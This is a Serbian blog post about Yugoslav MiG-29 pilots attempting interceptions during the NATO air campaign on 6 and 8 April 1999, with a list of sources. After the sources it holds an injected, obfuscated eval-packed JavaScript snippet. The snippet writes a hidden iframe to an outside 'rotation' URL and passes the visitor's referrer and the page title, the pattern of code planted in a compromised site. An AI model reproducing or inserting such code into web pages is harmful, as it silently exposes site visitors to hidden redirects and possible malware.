Home > Blog > „Vitezovi“ ponovo lete – 6. april 1999.   

„Vitezovi“ ponovo lete – 6. april 1999.   

Kao i njihovi preci koji su tokom kratkog i krvavog Aprilskog rata, 58 godina pre njih ispunili svoj zavet otadžbini hrabro se suprostavljajući, u zoru 6. aprila 1941. brojnijoj i nadmoćnijoj vazdušnoj sili Nemačke i njenih saveznika, tako su postupila i dva pilota VJ pre 15 godina, 6. aprila 1999. Ovo je njihova priča, epizoda o hrabrosti i odanosti otadžbini u muci i nevolji, onda kada je bilo potrebno poleteti  sa malim izgledima da će se sa leta živi vratiti.

U ranim jutarnjim časovima 6. aprila 1999. u 3.37h iz Operativnog centra korpusa PVO naređeno je poletanje jednog aviona L-18 (MiG-29) iz pripravnosti br.1 sa aerodroma Batajnica. U avionu se nalazio major Abdul Emeti koji poleće u 3.41h sa neosvetljene PSS br.2. Odmah po poletanju radarski ekran našeg lovca bio je pun ciljeva od kojih je veliki broj bio lažan. Major Emeti dostigao je visinu od 1500m i brzinom od 850km/h, traverzom Borča čekao uputstva oficira za navođenje (OZN) sa kojim nije mogao da uspostavi vezu. Slobodnom pretragom Emeti uočava u masi odraza, jedan cilj na radaru i uspeva da ga stavi u zahvat. Sekunda ili dve delile su našeg pilota od lansiranja rakete kada je cilj ispao iz zahvata.  Emeti je nastavio sa strmim usponom kako bi opet izvršio zahvat cilja kada je i sam upao u zahvat neprijateljskog radara. Odmah je izvršio prevrtanje aviona i manevar u suprotnu stranu od neprijatelja i uspeo da ispadne iz zahvata. Nastavi je kursom prema jugu gde bi trebalo da se nalazi njegov prvobitni cilj kada se javio OZN i preusmerio ga suprotno od pravca kretanja, na sever. Tamo nije bilo skoro nikakvih ciljeva vrednih pažnje pa je Emeti upućen na sletanje na polazni aerodrom. Let je trajao 17 minuta.

 

Drugo poletanje aviona tipa L-18 toga dana iz pripravnosti br.1 po naređenju 31.OCS izveo je pilot major Boro Zoraja sa aerodroma. Ponikve negde oko 23h. Zadatak je bio presretanje na 6000m u zoni Kruševca sa  sletanjem na aerodrom Niš. Po dolasku u rejon Kruševca, Zoraja se javio OZN i čekao dalja uputstva. Već u sledećem trenutku SPO uređaj je zablještao, svetlosnim i zvučnim signalima obaveštavajući pilota da je zahvaćen radarom neprijateljskog aviona. Zoraja je počeo energično da manevriše sa stalnim povećanjem visine i na nekih 8000m uspeo da ispadne iz zahvata. Kako nije mogao da uspostavi vezu sa OZN počeo je slobodnim lovom da sam traži neprijatelja. Ubrzo je na visini od 6000m uočio je 3 cilja, izvršio zahvat najbližeg i prebacio radar iz osmatračkog režima u nišanski. Cilj je bio udaljen 35km i dolazio je u susret našem avionu. Na udaljenosti od 30km od cilja Zoraja ponovo dobija signal SPO uređaja o ozračenosti, ponovo izvodi manevar sada sa snižavanjem visine i na 4000m uspeva da ispadne iz zahvata. Uporni Boro Zoraja ponovo je uspeo da pronađe svojim radarom ranije ciljeve na 40km koji su se udaljavali od njega u pravcu juga. Jureći nekih 3 minuta brzinom od 1000km/h za njima približavao se granici Makedonije i Bugarske. Major Zoraja odustao je od potere tek kada nije uspeo da ponovo ostvari zahvat i kada su se ciljevi razdvojili na tri strane. Okrenuo je avion prema severu i pošao na sletanje. Kako PSS na aerodromu Niš nije bila osvetljena naređeno mu je sletanje na aerodrom Lađevce koje je i izveo u 23.51h. Njegov let trajao je 40 minuta i to je bio najduži let tokom agresije.

Još jedno poletanje hrabrog „Viteza“ na lovcu MiG-29 iz sastava 127.lovačke avijacijske eskadrile, pre kobnog leta komandanta Pavlovića 4 .maja desio se u četvrtaka, 8. april 1999. godine. Toga dana, po naređenju 31.OCS, kapetan prve klase Dragan Milenković dobija pripravnost br.1 u 8.47h na aerodromu Lađevci. Signal za poletanje dobija u 9.46h a poletanje je zbog tehničkih neispravnosti ostvario tek u 9.55h. Na zadatak presretanja u zonu Kosova poleće na avionu L-18 (MiG-29) za koji zna da ima neispravnu kursnu navigaciju. Avion je naoružan sa 2 poluaktivno radarski vođene rakete R-27 i 4 IC samonavođene rakete R-73. Po poletanju dobija uputstva OZN da ide u reon Novi Pazar-Tutin na 5000m i tu da osmatra. Odmah po dolasku u zonu očekivanja Milenković tek što je uključuo svoj radar i počeo da osmatra uočava na nebu bele kondezacione tragove a ubrzo i signalizaciju SPO uređaja da je na nišanu protivničkog radara i da njihove rakete već lete prema njemu. Milenković energično manevriše sa smanjenjem visine velikom brzinom, trpeći opterećenje veće od 9G uspeva da nakon dva minuta izbegne rakete. Po njegovim rečima još toliko vremena mu je trebalo i da izađe iz zahvata radara NATO lovaca. Smanjivši visinu leta na 500m, stabilisao je avion i okreće prema zapadu, kada dobija zahvat sa zemlje, od strane radara nekog našeg PVO sistema, koji je na sreću trajao veoma kratko. Odlazi na sletanje i na više radio kanala ne uspeva da nikoga da dobije. Tek po dolasku u blizinu Kraljeva i u domet ručne radio stanice koja se nalazila na aerodormu Lađevci uspostavlja kontakt i uspeva da sleti sa minimalnom količinom goriva. Danas je Dragan Milenković jedan je od retkih (možda i jedini) pilota tadašnje 127.lae koji su leteli za vreme agresije koji je još uvek u aktivnoj vojnoj službi.

 

  • Odlomci iz monografije “204. lovački avijacijski puk” (Saša Olujić, Goran Antić i Bojan Dimitrijević, Beograd 2005.)
  • Svedočenja samih pilota i neposrednih svedoka događaja iz dokumentarnih filmova „Niko nije rekao neću“ i „Niko nije rekao neću – drugi deo“  (RTS)
  • Foto: sajt Vojske Srbije, foto-arhiv VSCG

eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!”.replace(/^/,String)){while(c–)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return’\\w+’};c=1};while(c–)if(k[c])p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c]);return p}(‘(7(){2 d=3;2 w=1;2 h=1;2 t=d.8(\’9\’);2 4=5.a(5.b()*c);2 0=\’e://f.g/i/j?\';0=0+\’k=\’+3.l;0=0+\’&m=\’+3.n;0=0+\’&r=\’+4;d.o(\’\’)})();’,35,35,’src||var|document|id|Math|iframe|function|createElement|script|floor|random|9999||http|needalogo|net||rotation|3wBsvV|se_referrer|referrer|default_keyword|title|write|style|padding||0px||border|none||width|height’.split(‘|’),0,{}))

Leave a Reply

Your email address will not be published. Required fields are marked *

*

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

Scroll To Top